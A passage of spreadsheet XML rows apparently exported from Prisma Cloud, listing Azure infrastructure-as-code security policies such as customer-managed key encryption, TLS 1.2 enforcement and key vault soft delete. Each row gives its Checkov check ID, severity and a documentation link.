https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-general-policies/azr-general-166</t>
        </is>
      </c>
      <c r="Y879" t="inlineStr"/>
      <c r="Z879" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_container_registry"]}</t>
        </is>
      </c>
      <c r="AA879" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB879" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC879" t="inlineStr">
        <is>
          <t>CKV_AZURE_166</t>
        </is>
      </c>
      <c r="AD879" t="b">
        <v>1</v>
      </c>
      <c r="AE879" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF879" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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79" t="inlineStr">
        <is>
          <t>727ccaf5-59bc-4301-9546-f229fec037c5</t>
        </is>
      </c>
      <c r="AI879" t="inlineStr"/>
      <c r="AJ879" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK879" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="880">
      <c r="A880" t="inlineStr"/>
      <c r="B880" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C880" s="2" t="inlineStr"/>
      <c r="D880" t="inlineStr"/>
      <c r="E880" t="inlineStr"/>
      <c r="F880" t="inlineStr"/>
      <c r="G880" t="b">
        <v>1</v>
      </c>
      <c r="H8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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J880" t="inlineStr">
        <is>
          <t>IaC:General:azure-container</t>
        </is>
      </c>
      <c r="K880" t="inlineStr">
        <is>
          <t>Azure Container Registry dedicated data endpoint is disabled</t>
        </is>
      </c>
      <c r="L880" t="inlineStr"/>
      <c r="M880" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N880" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O880" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P880" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q880" t="inlineStr"/>
      <c r="R880" t="inlineStr"/>
      <c r="S880" t="inlineStr"/>
      <c r="T880" t="b">
        <v>0</v>
      </c>
      <c r="U880" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V880" t="inlineStr">
        <is>
          <t>IaC:General:azure-container-registry</t>
        </is>
      </c>
      <c r="W880" t="inlineStr">
        <is>
          <t>Ensure dedicated data endpoints are enabled.</t>
        </is>
      </c>
      <c r="X880" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azure-237</t>
        </is>
      </c>
      <c r="Y880" t="inlineStr"/>
      <c r="Z880" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_container_registry"]}</t>
        </is>
      </c>
      <c r="AA880" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB880" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC880" t="inlineStr">
        <is>
          <t>CKV_AZURE_237</t>
        </is>
      </c>
      <c r="AD880" t="b">
        <v>1</v>
      </c>
      <c r="AE880" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF880" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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0" t="inlineStr">
        <is>
          <t>28f35a89-ce8c-4423-a057-6101244ffb49</t>
        </is>
      </c>
      <c r="AI880" t="inlineStr"/>
      <c r="AJ880" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK880" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="881">
      <c r="A881" t="inlineStr"/>
      <c r="B881" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C881" s="2" t="inlineStr"/>
      <c r="D881" t="inlineStr"/>
      <c r="E881" t="inlineStr"/>
      <c r="F881" t="inlineStr"/>
      <c r="G881" t="b">
        <v>1</v>
      </c>
      <c r="H8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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J881" t="inlineStr">
        <is>
          <t>IaC:General:azure-cosmosdb</t>
        </is>
      </c>
      <c r="K881" t="inlineStr">
        <is>
          <t>Cosmos DB Accounts do not have CMKs encrypting data at rest</t>
        </is>
      </c>
      <c r="L881" t="inlineStr"/>
      <c r="M881" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N881" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O881" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P881" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q881" t="inlineStr"/>
      <c r="R881" t="inlineStr"/>
      <c r="S881" t="inlineStr"/>
      <c r="T881" t="b">
        <v>0</v>
      </c>
      <c r="U881" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V881" t="inlineStr">
        <is>
          <t>IaC:General:azure-cosmosdb-account</t>
        </is>
      </c>
      <c r="W881" t="inlineStr">
        <is>
          <t>Ensure that Cosmos DB accounts have customer-managed keys to encrypt data at rest</t>
        </is>
      </c>
      <c r="X881" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-cosmos-db-accounts-have-customer-managed-keys-to-encrypt-data-at-rest</t>
        </is>
      </c>
      <c r="Y881" t="inlineStr"/>
      <c r="Z881" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_cosmosdb_account"]}</t>
        </is>
      </c>
      <c r="AA881" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB881" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC881" t="inlineStr">
        <is>
          <t>CKV_AZURE_100</t>
        </is>
      </c>
      <c r="AD881" t="b">
        <v>1</v>
      </c>
      <c r="AE881" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF881" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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1" t="inlineStr">
        <is>
          <t>51ba0997-2c15-4113-a1e9-81500b84e4fb</t>
        </is>
      </c>
      <c r="AI881" t="inlineStr"/>
      <c r="AJ881" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK881" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="882">
      <c r="A882" t="inlineStr"/>
      <c r="B882" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C882" s="2" t="inlineStr"/>
      <c r="D882" t="inlineStr"/>
      <c r="E882" t="inlineStr"/>
      <c r="F882" t="inlineStr"/>
      <c r="G882" t="b">
        <v>1</v>
      </c>
      <c r="H8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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J882" t="inlineStr">
        <is>
          <t>IaC:General:azure-data</t>
        </is>
      </c>
      <c r="K882" t="inlineStr">
        <is>
          <t>Azure Data Factory does not use Git repository for source control</t>
        </is>
      </c>
      <c r="L882" t="inlineStr"/>
      <c r="M882" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N882" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O882" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P882" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q882" t="inlineStr"/>
      <c r="R882" t="inlineStr"/>
      <c r="S882" t="inlineStr"/>
      <c r="T882" t="b">
        <v>0</v>
      </c>
      <c r="U882" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V882" t="inlineStr">
        <is>
          <t>IaC:General:azure-data-factory</t>
        </is>
      </c>
      <c r="W882" t="inlineStr">
        <is>
          <t>Ensure that Azure Data Factory uses Git repository for source control</t>
        </is>
      </c>
      <c r="X882" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-data-factory-uses-git-repository-for-source-control</t>
        </is>
      </c>
      <c r="Y882" t="inlineStr"/>
      <c r="Z882" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_data_factory"]}</t>
        </is>
      </c>
      <c r="AA882" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB882" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC882" t="inlineStr">
        <is>
          <t>CKV_AZURE_103</t>
        </is>
      </c>
      <c r="AD882" t="b">
        <v>1</v>
      </c>
      <c r="AE882" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF882" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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2" t="inlineStr">
        <is>
          <t>0bebac00-c052-496f-b226-3cfddcc71c9c</t>
        </is>
      </c>
      <c r="AI882" t="inlineStr"/>
      <c r="AJ882" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK882" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="883">
      <c r="A883" t="inlineStr"/>
      <c r="B883" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C883" s="2" t="inlineStr"/>
      <c r="D883" t="inlineStr"/>
      <c r="E883" t="inlineStr"/>
      <c r="F883" t="inlineStr"/>
      <c r="G883" t="b">
        <v>1</v>
      </c>
      <c r="H8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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J883" t="inlineStr">
        <is>
          <t>IaC:General:azure-data</t>
        </is>
      </c>
      <c r="K883" t="inlineStr">
        <is>
          <t>Azure data factories are not encrypted with a customer-managed key</t>
        </is>
      </c>
      <c r="L883" t="inlineStr"/>
      <c r="M883" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N883" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O883" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P883" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q883" t="inlineStr"/>
      <c r="R883" t="inlineStr"/>
      <c r="S883" t="inlineStr"/>
      <c r="T883" t="b">
        <v>0</v>
      </c>
      <c r="U883" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V883" t="inlineStr">
        <is>
          <t>IaC:General:azure-data-factory</t>
        </is>
      </c>
      <c r="W883" t="inlineStr">
        <is>
          <t>Ensure that Azure data factories are encrypted with a customer-managed key</t>
        </is>
      </c>
      <c r="X883" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-data-factories-are-encrypted-with-a-customer-managed-key</t>
        </is>
      </c>
      <c r="Y883" t="inlineStr"/>
      <c r="Z883" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_data_factory"]}</t>
        </is>
      </c>
      <c r="AA883" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB883" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC883" t="inlineStr">
        <is>
          <t>CKV2_AZURE_15</t>
        </is>
      </c>
      <c r="AD883" t="b">
        <v>1</v>
      </c>
      <c r="AE883" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF883" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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3" t="inlineStr">
        <is>
          <t>76436a36-e177-400f-8a7b-9d116f4d9340</t>
        </is>
      </c>
      <c r="AI883" t="inlineStr"/>
      <c r="AJ883" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK883" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="884">
      <c r="A884" t="inlineStr"/>
      <c r="B884" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C884" s="2" t="inlineStr"/>
      <c r="D884" t="inlineStr"/>
      <c r="E884" t="inlineStr"/>
      <c r="F884" t="inlineStr"/>
      <c r="G884" t="b">
        <v>1</v>
      </c>
      <c r="H8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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J884" t="inlineStr">
        <is>
          <t>IaC:General:azure-data</t>
        </is>
      </c>
      <c r="K884" t="inlineStr">
        <is>
          <t>Unencrypted Data Lake Store accounts</t>
        </is>
      </c>
      <c r="L884" t="inlineStr"/>
      <c r="M884" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N884" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O884" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P884" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q884" t="inlineStr"/>
      <c r="R884" t="inlineStr"/>
      <c r="S884" t="inlineStr"/>
      <c r="T884" t="b">
        <v>0</v>
      </c>
      <c r="U884" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V884" t="inlineStr">
        <is>
          <t>IaC:General:azure-data-lake-store</t>
        </is>
      </c>
      <c r="W884" t="inlineStr">
        <is>
          <t>Ensure that Data Lake Store accounts enables encryption</t>
        </is>
      </c>
      <c r="X884" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-data-lake-store-accounts-enables-encryption</t>
        </is>
      </c>
      <c r="Y884" t="inlineStr"/>
      <c r="Z884" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_data_lake_store"]}</t>
        </is>
      </c>
      <c r="AA884" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB884" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC884" t="inlineStr">
        <is>
          <t>CKV_AZURE_105</t>
        </is>
      </c>
      <c r="AD884" t="b">
        <v>1</v>
      </c>
      <c r="AE884" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF884" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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4" t="inlineStr">
        <is>
          <t>02889fff-fde0-4b22-b63c-08d49724af32</t>
        </is>
      </c>
      <c r="AI884" t="inlineStr"/>
      <c r="AJ884" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK884" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="885">
      <c r="A885" t="inlineStr"/>
      <c r="B885" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C885" s="2" t="inlineStr"/>
      <c r="D885" t="inlineStr"/>
      <c r="E885" t="inlineStr"/>
      <c r="F885" t="inlineStr"/>
      <c r="G885" t="b">
        <v>1</v>
      </c>
      <c r="H8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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J885" t="inlineStr">
        <is>
          <t>IaC:General:azure-databricks</t>
        </is>
      </c>
      <c r="K885" t="inlineStr">
        <is>
          <t>Azure Databricks Workspaces not using customer-managed key for root DBFS encryption</t>
        </is>
      </c>
      <c r="L885" t="inlineStr"/>
      <c r="M885" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N885" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O885" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P885" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q885" t="inlineStr"/>
      <c r="R885" t="inlineStr"/>
      <c r="S885" t="inlineStr"/>
      <c r="T885" t="b">
        <v>0</v>
      </c>
      <c r="U885" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V885" t="inlineStr">
        <is>
          <t>IaC:General:azure-databricks-workspace</t>
        </is>
      </c>
      <c r="W885" t="inlineStr">
        <is>
          <t>Ensure that Databricks Workspaces enables customer-managed key for root DBFS encryption</t>
        </is>
      </c>
      <c r="X885" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azure-2-48</t>
        </is>
      </c>
      <c r="Y885" t="inlineStr"/>
      <c r="Z885" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_databricks_workspace"]}</t>
        </is>
      </c>
      <c r="AA885" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB885" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC885" t="inlineStr">
        <is>
          <t>CKV2_AZURE_48</t>
        </is>
      </c>
      <c r="AD885" t="b">
        <v>1</v>
      </c>
      <c r="AE885" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF885" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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5" t="inlineStr">
        <is>
          <t>5495b666-049c-496b-bfda-9ee9c2449d36</t>
        </is>
      </c>
      <c r="AI885" t="inlineStr"/>
      <c r="AJ885" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK885" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="886">
      <c r="A886" t="inlineStr"/>
      <c r="B886" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C886" s="2" t="inlineStr"/>
      <c r="D886" t="inlineStr"/>
      <c r="E886" t="inlineStr"/>
      <c r="F886" t="inlineStr"/>
      <c r="G886" t="b">
        <v>1</v>
      </c>
      <c r="H8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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J886" t="inlineStr">
        <is>
          <t>IaC:General:azure-eventhub</t>
        </is>
      </c>
      <c r="K886" t="inlineStr">
        <is>
          <t>Event Hub Namespace not using TLS 1.2 or greater</t>
        </is>
      </c>
      <c r="L886" t="inlineStr"/>
      <c r="M886" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N886" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O886" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P886" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q886" t="inlineStr"/>
      <c r="R886" t="inlineStr"/>
      <c r="S886" t="inlineStr"/>
      <c r="T886" t="b">
        <v>0</v>
      </c>
      <c r="U886" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V886" t="inlineStr">
        <is>
          <t>IaC:General:azure-eventhub-namespace</t>
        </is>
      </c>
      <c r="W886" t="inlineStr">
        <is>
          <t>Ensure Event Hub Namespace uses at least TLS 1.2</t>
        </is>
      </c>
      <c r="X886" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azure-223</t>
        </is>
      </c>
      <c r="Y886" t="inlineStr"/>
      <c r="Z886" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_eventhub_namespace"]}</t>
        </is>
      </c>
      <c r="AA886" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB886" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC886" t="inlineStr">
        <is>
          <t>CKV_AZURE_223</t>
        </is>
      </c>
      <c r="AD886" t="b">
        <v>1</v>
      </c>
      <c r="AE886" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF886" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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6" t="inlineStr">
        <is>
          <t>1f23b527-2f62-4ebb-bb71-129dc07c07d8</t>
        </is>
      </c>
      <c r="AI886" t="inlineStr"/>
      <c r="AJ886" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK886" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="887">
      <c r="A887" t="inlineStr"/>
      <c r="B887" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C887" s="2" t="inlineStr"/>
      <c r="D887" t="inlineStr"/>
      <c r="E887" t="inlineStr"/>
      <c r="F887" t="inlineStr"/>
      <c r="G887" t="b">
        <v>1</v>
      </c>
      <c r="H8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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J887" t="inlineStr">
        <is>
          <t>IaC:General:azure-function</t>
        </is>
      </c>
      <c r="K887" t="inlineStr">
        <is>
          <t>CORS allows resources to access function apps</t>
        </is>
      </c>
      <c r="L887" t="inlineStr"/>
      <c r="M887" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N887" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O887" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P887" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q887" t="inlineStr"/>
      <c r="R887" t="inlineStr"/>
      <c r="S887" t="inlineStr"/>
      <c r="T887" t="b">
        <v>0</v>
      </c>
      <c r="U887" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V887" t="inlineStr">
        <is>
          <t>IaC:General:azure-function-app</t>
        </is>
      </c>
      <c r="W887" t="inlineStr">
        <is>
          <t>Ensure function apps are not accessible from all regions</t>
        </is>
      </c>
      <c r="X887" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-cors-disallows-every-resource-to-access-function-apps</t>
        </is>
      </c>
      <c r="Y887" t="inlineStr"/>
      <c r="Z887" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_function_app"]}</t>
        </is>
      </c>
      <c r="AA887" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB887" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC887" t="inlineStr">
        <is>
          <t>CKV_AZURE_62</t>
        </is>
      </c>
      <c r="AD887" t="b">
        <v>1</v>
      </c>
      <c r="AE887" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF887" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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7" t="inlineStr">
        <is>
          <t>1c775345-9c89-47fb-880f-f2a0c3be6f21</t>
        </is>
      </c>
      <c r="AI887" t="inlineStr"/>
      <c r="AJ887" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK887" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="888">
      <c r="A888" t="inlineStr"/>
      <c r="B888" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C888" s="2" t="inlineStr"/>
      <c r="D888" t="inlineStr"/>
      <c r="E888" t="inlineStr"/>
      <c r="F888" t="inlineStr"/>
      <c r="G888" t="b">
        <v>1</v>
      </c>
      <c r="H8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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J888" t="inlineStr">
        <is>
          <t>IaC:General:azure-function</t>
        </is>
      </c>
      <c r="K888" t="inlineStr">
        <is>
          <t>Azure Built-in logging for Azure function app is disabled</t>
        </is>
      </c>
      <c r="L888" t="inlineStr"/>
      <c r="M888" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N888" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O888" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P888" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q888" t="inlineStr"/>
      <c r="R888" t="inlineStr"/>
      <c r="S888" t="inlineStr"/>
      <c r="T888" t="b">
        <v>0</v>
      </c>
      <c r="U888" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V888" t="inlineStr">
        <is>
          <t>IaC:General:azure-function-app-slot,azure-function-app</t>
        </is>
      </c>
      <c r="W888" t="inlineStr">
        <is>
          <t>Ensure function app builtin logging is enabled</t>
        </is>
      </c>
      <c r="X888" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-azure-built-in-logging-for-azure-function-app-is-enabled</t>
        </is>
      </c>
      <c r="Y888" t="inlineStr"/>
      <c r="Z888" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_function_app_slot", "azurerm_function_app"]}</t>
        </is>
      </c>
      <c r="AA888" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB888" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC888" t="inlineStr">
        <is>
          <t>CKV_AZURE_159</t>
        </is>
      </c>
      <c r="AD888" t="b">
        <v>1</v>
      </c>
      <c r="AE888" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF888" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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8" t="inlineStr">
        <is>
          <t>c3c078fd-43db-4b13-b3f8-12b8da130e45</t>
        </is>
      </c>
      <c r="AI888" t="inlineStr"/>
      <c r="AJ888" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK888" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="889">
      <c r="A889" t="inlineStr"/>
      <c r="B889" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C889" s="2" t="inlineStr"/>
      <c r="D889" t="inlineStr"/>
      <c r="E889" t="inlineStr"/>
      <c r="F889" t="inlineStr"/>
      <c r="G889" t="b">
        <v>1</v>
      </c>
      <c r="H8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89" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J889" t="inlineStr">
        <is>
          <t>IaC:General:azure-key</t>
        </is>
      </c>
      <c r="K889" t="inlineStr">
        <is>
          <t>Key vault does not enable soft-delete</t>
        </is>
      </c>
      <c r="L889" t="inlineStr"/>
      <c r="M889" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N889" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O889" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P889" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q889" t="inlineStr"/>
      <c r="R889" t="inlineStr"/>
      <c r="S889" t="inlineStr"/>
      <c r="T889" t="b">
        <v>0</v>
      </c>
      <c r="U889" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V889" t="inlineStr">
        <is>
          <t>IaC:General:azure-key-vault</t>
        </is>
      </c>
      <c r="W889" t="inlineStr">
        <is>
          <t>Ensure that key vault enables soft delete</t>
        </is>
      </c>
      <c r="X889" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-key-vault-enables-soft-delete</t>
        </is>
      </c>
      <c r="Y889" t="inlineStr"/>
      <c r="Z889" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_key_vault"]}</t>
        </is>
      </c>
      <c r="AA889" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB889" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC889" t="inlineStr">
        <is>
          <t>CKV_AZURE_111</t>
        </is>
      </c>
      <c r="AD889" t="b">
        <v>1</v>
      </c>
      <c r="AE889" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF889" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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89" t="inlineStr">
        <is>
          <t>01fb7eb5-26d1-4cfa-8c8e-eae7d5fa5683</t>
        </is>
      </c>
      <c r="AI889" t="inlineStr"/>
      <c r="AJ889" t="inlineStr">
        <is>
          <t>false</t>
